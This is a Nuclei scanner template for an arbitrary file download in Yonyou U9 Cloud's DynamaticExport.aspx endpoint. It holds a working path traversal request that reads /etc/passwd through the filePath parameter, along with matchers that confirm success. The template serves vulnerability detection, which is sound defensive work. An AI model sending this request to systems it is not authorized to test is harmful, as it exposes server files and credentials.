http:
    - matchers:
        - type: word
          words:
            - root:x:0:0
        - status:
            - 200
          type: status
        - part: header
          type: word
          words:
            - text/plain
      matchers-condition: and
      raw:
        - |
          GET /Portal/Print/DynamaticExport.aspx?filePath=../../etc/passwd HTTP/1.1
          Host: {{Hostname}}
id: yonyou-dynamaticexport-arbitrary-file-download
info:
    author: ProjectDiscoveryAI
    description: |
        This template checks for an arbitrary file download vulnerability in Yonyou U9 Cloud's `DynamaticExport.aspx` endpoint. The issue allows attackers to download sensitive files from the server by manipulating the `filePath` parameter.
    name: Yonyou U9 Cloud DynamaticExport Arbitrary File Download
    severity: high
    tags:
        - yonyou
        - u9cloud
        - arbitrary-file-download
